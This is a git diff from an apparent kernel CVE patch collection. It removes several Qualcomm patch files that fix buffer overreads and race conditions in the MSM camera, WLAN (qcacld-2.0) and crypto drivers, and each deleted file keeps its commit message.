-diff --git a/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c b/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c
-index 4a13ef87898d7..0390e0e60deab 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c
-@@ -498,22 +498,44 @@ static int32_t msm_flash_init(
- return 0;
- }
-
--#ifdef CONFIG_COMPAT
- static int32_t msm_flash_init_prepare(
- struct msm_flash_ctrl_t *flash_ctrl,
- struct msm_flash_cfg_data_t *flash_data)
- {
-+#ifdef CONFIG_COMPAT
-+ struct msm_flash_cfg_data_t flash_data_k;
-+ struct msm_flash_init_info_t flash_init_info;
-+ int32_t i = 0;
-+ if(!is_compat_task()) {
-+ /*for 64-bit usecase,it need copy the data to local memory*/
-+ flash_data_k.cfg_type = flash_data->cfg_type;
-+ for (i = 0; i < MAX_LED_TRIGGERS; i++) {
-+ flash_data_k.flash_current[i] =
-+ flash_data->flash_current[i];
-+ flash_data_k.flash_duration[i] =
-+ flash_data->flash_duration[i];
-+ }
-+
-+ flash_data_k.cfg.flash_init_info = &flash_init_info;
-+ if (copy_from_user(&flash_init_info,
-+ (void *)(flash_data->cfg.flash_init_info),
-+ sizeof(struct msm_flash_init_info_t))) {
-+ pr_err("%s copy_from_user failed %d\n",
-+ __func__, __LINE__);
-+ return -EFAULT;
-+ }
-+ return msm_flash_init(flash_ctrl,
&flash_data_k);
-+ }
-+ /*
-+ * for 32-bit usecase,it already copy the userspace
-+ * data to local memory in msm_flash_subdev_do_ioctl()
-+ * so here do not need copy from user
-+ */
- return msm_flash_init(flash_ctrl, flash_data);
--}
- #else
--static int32_t msm_flash_init_prepare(
-- struct msm_flash_ctrl_t *flash_ctrl,
-- struct msm_flash_cfg_data_t *flash_data)
--{
- struct msm_flash_cfg_data_t flash_data_k;
- struct msm_flash_init_info_t flash_init_info;
- int32_t i = 0;
--
- flash_data_k.cfg_type = flash_data->cfg_type;
- for (i = 0; i < MAX_LED_TRIGGERS; i++) {
- flash_data_k.flash_current[i] =
-@@ -531,8 +553,8 @@ static int32_t msm_flash_init_prepare(
- return -EFAULT;
- }
- return msm_flash_init(flash_ctrl, &flash_data_k);
--}
- #endif
-+}
-
- static int32_t msm_flash_low(
- struct msm_flash_ctrl_t *flash_ctrl,
diff --git a/Patches/Linux_CVEs/CVE-2017-11058/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-11058/qcacld-2.0/0001.patch
deleted file mode 100644
index 772c38c8..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11058/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,90 +0,0 @@
-From 4d9812973e8b12700afd8c3d6f36a94506ffb6fc Mon Sep 17 00:00:00 2001
-From: Jeff Johnson
-Date: Thu, 15 Jun 2017 10:51:02 -0700
-Subject: qcacld-2.0: Avoid overread when configuring MAC addresses
-
-Currently there are multiple cfg80211 vendor commands where MAC
-address attributes are defined in a nla_policy table with a type of
-NLA_UNSPEC but without a minimum length. Add the proper minimum length
-to avoid buffer overread.
-
-Change-Id: I11ff2bd813dc4e6784a7cdee66a0c10ca0e69fcf
-CRs-Fixed: 2061251
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 26 ++++++++++++++++++--------
- 1 file changed, 18 insertions(+), 8 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index 1ac1fc1..2ec3d68 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -841,7 +841,9 @@ wlan_hdd_extscan_config_policy[QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_
- [QCA_WLAN_VENDOR_ATTR_EXTSCAN_GET_CACHED_SCAN_RESULTS_CONFIG_PARAM_FLUSH] = { .type = NLA_U8 },
-
- [QCA_WLAN_VENDOR_ATTR_EXTSCAN_GET_CACHED_SCAN_RESULTS_CONFIG_PARAM_MAX] = { .type = NLA_U32 },
-- [QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM_BSSID] = { .type = NLA_UNSPEC },
-+ [QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM_BSSID] = {
-+ .type = NLA_UNSPEC,
-+ .len = HDD_MAC_ADDR_LEN},
- [QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM_RSSI_LOW] = { .type = NLA_S32 },
- [QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM_RSSI_HIGH] = { .type = NLA_S32 },
- [QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM_CHANNEL] = { .type = NLA_U32 },
-@@ -8080,7 +8082,9 @@ wlan_hdd_cfg80211_get_logger_supp_feature(struct wiphy *wiphy,
- static const struct nla_policy
- wlan_hdd_tdls_config_enable_policy[QCA_WLAN_VENDOR_ATTR_TDLS_ENABLE_MAX +1] =
- {
-- [QCA_WLAN_VENDOR_ATTR_TDLS_ENABLE_MAC_ADDR] = {.type = NLA_UNSPEC },
-+ [QCA_WLAN_VENDOR_ATTR_TDLS_ENABLE_MAC_ADDR] = {
-+ .type = NLA_UNSPEC,
-+ .len = HDD_MAC_ADDR_LEN},
- [QCA_WLAN_VENDOR_ATTR_TDLS_ENABLE_CHANNEL] = {.type = NLA_S32 },
- [QCA_WLAN_VENDOR_ATTR_TDLS_ENABLE_GLOBAL_OPERATING_CLASS] =
- {.type = NLA_S32 },
-@@ -8092,15 +8096,18 @@ wlan_hdd_tdls_config_enable_policy[QCA_WLAN_VENDOR_ATTR_TDLS_ENABLE_MAX +1] =
- static const struct nla_policy
- wlan_hdd_tdls_config_disable_policy[QCA_WLAN_VENDOR_ATTR_TDLS_DISABLE_MAX +1] =
- {
-- [QCA_WLAN_VENDOR_ATTR_TDLS_DISABLE_MAC_ADDR] = {.type = NLA_UNSPEC },
--
-+ [QCA_WLAN_VENDOR_ATTR_TDLS_DISABLE_MAC_ADDR] = {
-+ .type = NLA_UNSPEC,
-+ .len = HDD_MAC_ADDR_LEN},
- };
-
- static const struct nla_policy
- wlan_hdd_tdls_config_state_change_policy[
- QCA_WLAN_VENDOR_ATTR_TDLS_STATE_MAX +1] =
- {
-- [QCA_WLAN_VENDOR_ATTR_TDLS_STATE_MAC_ADDR] = {.type = NLA_UNSPEC },
-+ [QCA_WLAN_VENDOR_ATTR_TDLS_STATE_MAC_ADDR] = {
-+ .type = NLA_UNSPEC,
-+ .len = HDD_MAC_ADDR_LEN},
- [QCA_WLAN_VENDOR_ATTR_TDLS_NEW_STATE] = {.type = NLA_U32 },
- [QCA_WLAN_VENDOR_ATTR_TDLS_STATE_REASON] = {.type = NLA_S32 },
- [QCA_WLAN_VENDOR_ATTR_TDLS_STATE_CHANNEL] = {.type = NLA_U32 },
-@@ -8113,7 +8120,9 @@ static const struct nla_policy
- wlan_hdd_tdls_config_get_status_policy[
- QCA_WLAN_VENDOR_ATTR_TDLS_GET_STATUS_MAX +1] =
- {
-- [QCA_WLAN_VENDOR_ATTR_TDLS_GET_STATUS_MAC_ADDR] = {.type = NLA_UNSPEC },
-+ [QCA_WLAN_VENDOR_ATTR_TDLS_GET_STATUS_MAC_ADDR] = {
-+ .type = NLA_UNSPEC,
-+ .len = HDD_MAC_ADDR_LEN},
- [QCA_WLAN_VENDOR_ATTR_TDLS_GET_STATUS_STATE] = {.type = NLA_U32 },
- [QCA_WLAN_VENDOR_ATTR_TDLS_GET_STATUS_REASON] = {.type = NLA_S32 },
- [QCA_WLAN_VENDOR_ATTR_TDLS_GET_STATUS_CHANNEL] = {.type = NLA_U32 },
-@@ -10761,8 +10770,9 @@ static int __wlan_hdd_cfg80211_wifi_logger_start(struct wiphy *wiphy,
- static const struct
- nla_policy
- qca_wlan_vendor_attr_policy[QCA_WLAN_VENDOR_ATTR_MAX+1] = {
-- [QCA_WLAN_VENDOR_ATTR_MAC_ADDR] =
-- { .type = NLA_BINARY, .len = VOS_MAC_ADDR_SIZE },
-+ [QCA_WLAN_VENDOR_ATTR_MAC_ADDR] = {
-+ .type = NLA_BINARY,
-+ .len = HDD_MAC_ADDR_LEN},
- };
-
- /**
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11059/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-11059/ANY/0001.patch
deleted file mode 100644
index 6458e65d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11059/ANY/0001.patch
+++ /dev/null
@@ -1,83 +0,0 @@
-From be632ce97422dfe533944186e2f4420b87b87ad5 Mon Sep 17 00:00:00 2001
-From: Oleg Matcovschi
-Date: Wed, 9 Aug 2017 23:18:19 -0700
-Subject: [PATCH] crypto: msm: Fix several race condition issues in crypto
- drivers
-
-Check areq before referencing, replace xchg to automic_xchg and
-verify return values of set key during SHA operations.
-
-Bug: 37284397
-Signed-off-by: Brahmaji K
-Signed-off-by: Paresh Purabhiya
-Change-Id: I98a9541a1d3a8c8d5e974348c76b92da1d5102e6
----
- drivers/crypto/msm/qce50.c | 4 ++++
- drivers/crypto/msm/qcrypto.c | 14 ++++++++++----
- 2 files changed, 14 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/crypto/msm/qce50.c b/drivers/crypto/msm/qce50.c
-index 0e017b3c0c3ff..6bd9d56b13566 100644
---- a/drivers/crypto/msm/qce50.c
-+++ b/drivers/crypto/msm/qce50.c
-@@ -2055,6 +2055,10 @@ static int _sha_complete(struct qce_device *pce_dev)
- uint32_t status;
-
- areq = (struct ahash_request *) pce_dev->areq;
-+ if (!areq) {
-+ pr_err("sha operation error. areq is NULL\n");
-+ return -ENXIO;
-+ }
- qce_dma_unmap_sg(pce_dev->pdev, areq->src, pce_dev->src_nents,
- DMA_TO_DEVICE);
- memcpy(digest, (char *)(&pce_dev->ce_sps.result->auth_iv[0]),
-diff --git a/drivers/crypto/msm/qcrypto.c b/drivers/crypto/msm/qcrypto.c
-index 04b28a58e38bd..e64d1dd51cb5f 100644
---- a/drivers/crypto/msm/qcrypto.c
-+++ b/drivers/crypto/msm/qcrypto.c
-@@ -3514,6 +3514,7 @@ static int _sha1_hmac_setkey(struct crypto_ahash *tfm, const u8 *key,
- unsigned int len)
- {
- struct qcrypto_sha_ctx *sha_ctx = crypto_tfm_ctx(&tfm->base);
-+ int ret = 0;
- memset(&sha_ctx->authkey[0], 0, SHA1_BLOCK_SIZE);
- if (len <= SHA1_BLOCK_SIZE) {
- memcpy(&sha_ctx->authkey[0], key, len);
-@@ -3521,16 +3522,19 @@ static int _sha1_hmac_setkey(struct crypto_ahash *tfm, const u8 *key,
- } else {
- sha_ctx->alg = QCE_HASH_SHA1;
- sha_ctx->diglen = SHA1_DIGEST_SIZE;
-- _sha_hmac_setkey(tfm, key, len);
-+ ret = _sha_hmac_setkey(tfm, key, len);
-+ if (ret)
-+ pr_err("SHA1 hmac setkey failed\n");
- sha_ctx->authkey_in_len = SHA1_BLOCK_SIZE;
- }
-- return 0;
-+ return ret;
- }
-
- static int _sha256_hmac_setkey(struct crypto_ahash *tfm, const u8 *key,
- unsigned int len)
- {
- struct qcrypto_sha_ctx *sha_ctx = crypto_tfm_ctx(&tfm->base);
-+ int ret = 0;
-
- memset(&sha_ctx->authkey[0], 0, SHA256_BLOCK_SIZE);
- if (len <= SHA256_BLOCK_SIZE) {
-@@ -3539,11 +3543,13 @@ static int _sha256_hmac_setkey(struct crypto_ahash *tfm, const u8 *key,
- } else {
- sha_ctx->alg = QCE_HASH_SHA256;
- sha_ctx->diglen = SHA256_DIGEST_SIZE;
-- _sha_hmac_setkey(tfm, key, len);
-+ ret = _sha_hmac_setkey(tfm, key, len);
-+ if (ret)
-+ pr_err("SHA256 hmac setkey failed\n");
- sha_ctx->authkey_in_len = SHA256_BLOCK_SIZE;
- }
-
-- return 0;
-+ return ret;
- }
-
- static int _sha_hmac_init_ihash(struct ahash_request *req,
diff --git a/Patches/Linux_CVEs/CVE-2017-11060/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-11060/qcacld-2.0/0001.patch
deleted file mode 100644
index 2000cbb1..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11060/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,116 +0,0 @@
-From 657bb41463b837b2681e1fed310bd97970b09b83 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma
-Date: Mon, 19 Jun 2017 19:21:42 +0530
-Subject: qcacld-2.0: Avoid buffer overread when parsing PNO commands
-
-Propagation from qcacld-3.0 to qcacld-2.0
-
-There are currently three issues which can result in a buffer overread
-when processing PNO vendor commands:
-1) __wlan_hdd_cfg80211_set_passpoint_list() specifies the wrong policy
- when invoking nla_parse().
-2) hdd_extscan_passpoint_fill_network_list() does not specify a policy
- when invoking nla_parse().
-3) __wlan_hdd_cfg80211_set_epno_list() specifies a policy but not all
- of the attributes that are parsed are present in the policy.
-To prevent buffer overread:
-1) Update __wlan_hdd_cfg80211_set_passpoint_list() and
- hdd_extscan_passpoint_fill_network_list() to use the policy
- wlan_hdd_pno_config_policy.
-2) Update wlan_hdd_pno_config_policy to contain all the fixed-length
- attributes needed by __wlan_hdd_cfg80211_set_passpoint_list(),
- hdd_extscan_passpoint_fill_network_list(), and
- __wlan_hdd_cfg80211_set_epno_list().
-
-Change-Id: I4a20e77ce87967ae78323b83a2aa9085fed2647f
-CRs-Fixed: 2058447
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 58 +++++++++++++++++++++++++++++-----------
- 1 file changed, 43 insertions(+), 15 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index cae8b45..20f127b 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -868,19 +868,46 @@ wlan_hdd_extscan_config_policy[QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_
-
- static const struct nla_policy
- wlan_hdd_pno_config_policy[QCA_WLAN_VENDOR_ATTR_PNO_MAX + 1] = {
-- [QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_NUM_NETWORKS] = {
-- .type = NLA_U32
-- },
-- [QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_SSID] = {
-- .type = NLA_BINARY,
-- .len = IEEE80211_MAX_SSID_LEN + 1
-- },
-- [QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_FLAGS] = {
-- .type = NLA_U8
-- },
-- [QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_AUTH_BIT] = {
-- .type = NLA_U8
-- },
-+ [QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_LIST_PARAM_NUM] = {
-+ .type = NLA_U32
-+ },
-+ [QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_NETWORK_PARAM_ID] = {
-+ .type = NLA_U32
-+ },
-+ [QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_NUM_NETWORKS] = {
-+ .type = NLA_U32
-+ },
-+ [QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_SSID] = {
-+ .type = NLA_BINARY,
-+ .len = IEEE80211_MAX_SSID_LEN + 1
-+ },
-+ [QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_FLAGS] = {
-+ .type = NLA_U8
-+ },
-+ [QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_AUTH_BIT] = {
-+ .type = NLA_U8
-+ },
-+ [QCA_WLAN_VENDOR_ATTR_EPNO_MIN5GHZ_RSSI] = {
-+ .type = NLA_U32
-+ },
-+ [QCA_WLAN_VENDOR_ATTR_EPNO_MIN24GHZ_RSSI] = {
-+ .type = NLA_U32
-+ },
-+ [QCA_WLAN_VENDOR_ATTR_EPNO_INITIAL_SCORE_MAX] = {
-+ .type = NLA_U32
-+ },
-+ [QCA_WLAN_VENDOR_ATTR_EPNO_CURRENT_CONNECTION_BONUS] = {
-+ .type = NLA_U32
-+ },
-+ [QCA_WLAN_VENDOR_ATTR_EPNO_SAME_NETWORK_BONUS] = {
-+ .type = NLA_U32
-+ },
-+ [QCA_WLAN_VENDOR_ATTR_EPNO_SECURE_BONUS] = {
-+ .type = NLA_U32
-+ },
-+ [QCA_WLAN_VENDOR_ATTR_EPNO_BAND5GHZ_BONUS] = {
-+ .type = NLA_U32
-+ },
- };
-
- static const struct nla_policy
-@@ -4914,7 +4941,8 @@ static int hdd_extscan_passpoint_fill_network_list(
-
- if (nla_parse(network,
- QCA_WLAN_VENDOR_ATTR_PNO_MAX,
-- nla_data(networks), nla_len(networks), NULL)) {
-+ nla_data(networks), nla_len(networks),
-+ wlan_hdd_pno_config_policy)) {
- hddLog(LOGE, FL("nla_parse failed"));
- return -EINVAL;
- }
-@@ -5015,7 +5043,7 @@ static int __wlan_hdd_cfg80211_set_passpoint_list(struct wiphy *wiphy,
- }
-
- if (nla_parse(tb, QCA_WLAN_VENDOR_ATTR_PNO_MAX, data, data_len,
-- wlan_hdd_extscan_config_policy)) {
-+ wlan_hdd_pno_config_policy)) {
- hddLog(LOGE, FL("Invalid ATTR"));
- return -EINVAL;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11061/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-11061/qcacld-2.0/0001.patch
deleted file mode 100644
index 3e8a5fac..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11061/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,110 +0,0 @@
-From e08628a3cfe039bc4bdd7fc66f5ec7a59a97b404 Mon Sep 17 00:00:00 2001
-From: Ravi Kumar Bokka
-Date: Mon, 12 Jun 2017 21:34:30 +0530
-Subject: qcacld-2.0: Validate vendor set roaming params command
-
-Currently there is no nl policy defined for vendor sub command
-QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX which may result in
-buffer overread error.
-
-To resolve this, add nl policy.
-
-Change-Id: Ib5d3c34dbcec29a98766753efc4e9c4ecf748c2e
-CRs-Fixed: 2059701
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 51 ++++++++++++++++++++++++++++++++++++----
- 1 file changed, 47 insertions(+), 4 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index 57ba680..313de1e 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -1870,6 +1870,49 @@ wlan_hdd_cfg80211_get_concurrency_matrix(struct wiphy *wiphy,
- return ret;
- }
-
-+#define MAX_ROAMING_PARAM \
-+ QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX
-+
-+static const struct nla_policy
-+wlan_hdd_set_roam_param_policy[MAX_ROAMING_PARAM + 1] = {
-+ [QCA_WLAN_VENDOR_ATTR_ROAMING_SUBCMD] = {.type = NLA_U32},
-+ [QCA_WLAN_VENDOR_ATTR_ROAMING_REQ_ID] = {.type = NLA_U32},
-+ [QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_WHITE_LIST_SSID_NUM_NETWORKS] = {
-+ .type = NLA_U32},
-+ [QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_WHITE_LIST_SSID_LIST] = {
-+ .type = NLA_U32},
-+ [QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_WHITE_LIST_SSID] = {
-+ .type = NLA_U32},
-+ [QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_A_BAND_BOOST_THRESHOLD] = {
-+ .type = NLA_S32},
-+ [QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_A_BAND_PENALTY_THRESHOLD] = {
-+ .type = NLA_S32},
-+ [QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_A_BAND_BOOST_FACTOR] = {
-+ .type = NLA_U32},
-+ [QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_A_BAND_PENALTY_FACTOR] = {
-+ .type = NLA_U32},
-+ [QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_A_BAND_MAX_BOOST] = {
-+ .type = NLA_U32},
-+ [QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_LAZY_ROAM_HISTERESYS] = {
-+ .type = NLA_S32},
-+ [QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_ALERT_ROAM_RSSI_TRIGGER] = {
-+ .type = NLA_U32},
-+ [QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_LAZY_ROAM_ENABLE] = {
-+ .type = NLA_S32},
-+ [QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_LAZY_ROAM_NUM_BSSID] = {
-+ .type = NLA_U32},
-+ [QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_LAZY_ROAM_BSSID] = {
-+ .type = NLA_BINARY,
-+ .len = MAC_ADDRESS_STR_LEN},
-+ [QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_LAZY_ROAM_RSSI_MODIFIER] = {
-+ .type = NLA_U32},
-+ [QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PARAMS_NUM_BSSID] = {
-+ .type = NLA_U32},
-+ [QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PARAMS_BSSID] = {
-+ .type = NLA_BINARY,
-+ .len = MAC_ADDRESS_STR_LEN},
-+};
-+
- static int
- __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- struct wireless_dev *wdev,
-@@ -1901,7 +1944,7 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
-
- if (nla_parse(tb, QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX,
- data, data_len,
-- NULL)) {
-+ wlan_hdd_set_roam_param_policy)) {
- hddLog(LOGE, FL("Invalid ATTR"));
- return -EINVAL;
- }
-@@ -1940,7 +1983,7 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- if (nla_parse(tb2,
- QCA_WLAN_VENDOR_ATTR_ROAM_SUBCMD_MAX,
- nla_data(curr_attr), nla_len(curr_attr),
-- NULL)) {
-+ wlan_hdd_set_roam_param_policy)) {
- hddLog(LOGE, FL("nla_parse failed"));
- goto fail;
- }
-@@ -2104,7 +2147,7 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- if (nla_parse(tb2,
- QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX,
- nla_data(curr_attr), nla_len(curr_attr),
-- NULL)) {
-+ wlan_hdd_set_roam_param_policy)) {
- hddLog(LOGE, FL("nla_parse failed"));
- goto fail;
- }
-@@ -2166,7 +2209,7 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- if (nla_parse(tb2,
- QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX,
- nla_data(curr_attr), nla_len(curr_attr),
-- NULL)) {
-+ wlan_hdd_set_roam_param_policy)) {
- hddLog(LOGE, FL("nla_parse failed"));
- goto fail;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11062/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-11062/qcacld-2.0/0001.patch
deleted file mode 100644
index 7f64a118..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11062/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,74 +0,0 @@
-From 954bdf216ce56a860092fd9549229b036e08c97b Mon Sep 17 00:00:00 2001
-From: Ashish Kumar Dhanotiya
-Date: Tue, 13 Jun 2017 18:41:49 +0530
-Subject: qcacld-2.0: Validate vendor command do_acs
-
-Currently attributes are not validated in __wlan_hdd_cfg80211_do_acs,
-this can lead to a buffer overread.
-
-To resolve this issue, Define an nla_policy and validate the
-attributes.
-
-CRs-Fixed: 2058448
-Change-Id: Ic1bd5abbef09407f925625b709f10cf9cb7c3d7f
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 27 +++++++++++++--------------
- 1 file changed, 13 insertions(+), 14 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index 2ec3d68..c87f7c0 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -9170,9 +9170,20 @@ static void
- wlan_hdd_set_mcc_to_scc_switch(hdd_adapter_t *adapter)
- {}
- #endif
-+static const struct nla_policy
-+wlan_hdd_cfg80211_do_acs_policy[QCA_WLAN_VENDOR_ATTR_ACS_MAX+1] = {
-+ [QCA_WLAN_VENDOR_ATTR_ACS_HW_MODE] = { .type = NLA_U8 },
-+ [QCA_WLAN_VENDOR_ATTR_ACS_HT_ENABLED] = { .type = NLA_FLAG },
-+ [QCA_WLAN_VENDOR_ATTR_ACS_HT40_ENABLED] = { .type = NLA_FLAG },
-+ [QCA_WLAN_VENDOR_ATTR_ACS_VHT_ENABLED] = { .type = NLA_FLAG },
-+ [QCA_WLAN_VENDOR_ATTR_ACS_CHWIDTH] = { .type = NLA_U16 },
-+ [QCA_WLAN_VENDOR_ATTR_ACS_CH_LIST] = { .type = NLA_UNSPEC },
-+};
-+
-
- /**
-- * __wlan_hdd_cfg80211_do_acs : CFG80211 handler fucntion for DO_ACS Vendor CMD
-+ * __wlan_hdd_cfg80211_do_acs() : CFG80211 handler fucntion for DO_ACS
-+ * Vendor CMD
- * @wiphy: Linux wiphy struct pointer
- * @wdev: Linux wireless device struct pointer
- * @data: ACS information from hostapd
-@@ -9216,18 +9227,6 @@ static int __wlan_hdd_cfg80211_do_acs(struct wiphy *wiphy,
- * config shall be set only from start_acs.
- */
-
-- /* nla_policy Policy template. Policy not applied as some attributes are
-- * optional and QCA_WLAN_VENDOR_ATTR_ACS_CH_LIST has variable length
-- *
-- * [QCA_WLAN_VENDOR_ATTR_ACS_HW_MODE] = { .type = NLA_U8 },
-- * [QCA_WLAN_VENDOR_ATTR_ACS_HT_ENABLED] = { .type = NLA_FLAG },
-- * [QCA_WLAN_VENDOR_ATTR_ACS_HT40_ENABLED] = { .type = NLA_FLAG },
-- * [QCA_WLAN_VENDOR_ATTR_ACS_VHT_ENABLED] = { .type = NLA_FLAG },
-- * [QCA_WLAN_VENDOR_ATTR_ACS_CHWIDTH] = { .type = NLA_U16 },
-- * [QCA_WLAN_VENDOR_ATTR_ACS_CH_LIST] = { .type = NLA_NESTED },
-- */
--
--
- status = wlan_hdd_validate_context(hdd_ctx);
- if (0 != status)
- return status;
-@@ -9257,7 +9256,7 @@ static int __wlan_hdd_cfg80211_do_acs(struct wiphy *wiphy,
- vos_mem_zero(&sap_config->acs_cfg, sizeof(struct sap_acs_cfg));
-
- status = nla_parse(tb, QCA_WLAN_VENDOR_ATTR_ACS_MAX, data, data_len,
-- NULL);
-+ wlan_hdd_cfg80211_do_acs_policy);
- if (status) {
- hddLog(VOS_TRACE_LEVEL_ERROR, FL("Invalid ATTR"));
- goto out;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11064/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-11064/qcacld-2.0/0001.patch
deleted file mode 100644
index 7cf55ffb..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11064/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,63 +0,0 @@
-From 38d6f16b8583bae6a1881c744ae08d609c99cb7e Mon Sep 17 00:00:00 2001
-From: Ashish Kumar Dhanotiya
-Date: Fri, 14 Jul 2017 15:25:52 +0530
-Subject: qcacld-2.0: Add an attribute to represent PNO/EPNO Request ID
-
-This request ID was wrongly referred from the REQUEST_ID in
-enum qca_wlan_vendor_attr_gscan_config_params which is mapped to
-QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_LIST_PARAM_NUM in PNO Config.
-Hence define a different attribute to represent the request ID
-for the PNO Config.
-
-CRs-Fixed: 2066628
-Change-Id: I2b5efe78605d07d92db564a987ea0ae4ff0a2cc8
----
- CORE/HDD/inc/wlan_hdd_cfg80211.h | 2 ++
- CORE/HDD/src/wlan_hdd_cfg80211.c | 7 +++++--
- 2 files changed, 7 insertions(+), 2 deletions(-)
-
-diff --git a/CORE/HDD/inc/wlan_hdd_cfg80211.h b/CORE/HDD/inc/wlan_hdd_cfg80211.h
-index 2a2f7d9..291ebd6 100644
---- a/CORE/HDD/inc/wlan_hdd_cfg80211.h
-+++ b/CORE/HDD/inc/wlan_hdd_cfg80211.h
-@@ -1417,6 +1417,8 @@ enum qca_wlan_vendor_attr_pno_config_params {
- */
- QCA_WLAN_VENDOR_ATTR_EPNO_BAND5GHZ_BONUS = 22,
-
-+ /* Unsigned 32-bit value, representing the PNO Request ID */
-+ QCA_WLAN_VENDOR_ATTR_PNO_CONFIG_REQUEST_ID = 23,
-
- /* keep last */
- QCA_WLAN_VENDOR_ATTR_PNO_AFTER_LAST,
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index 2ec4ca3..8279b8f 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
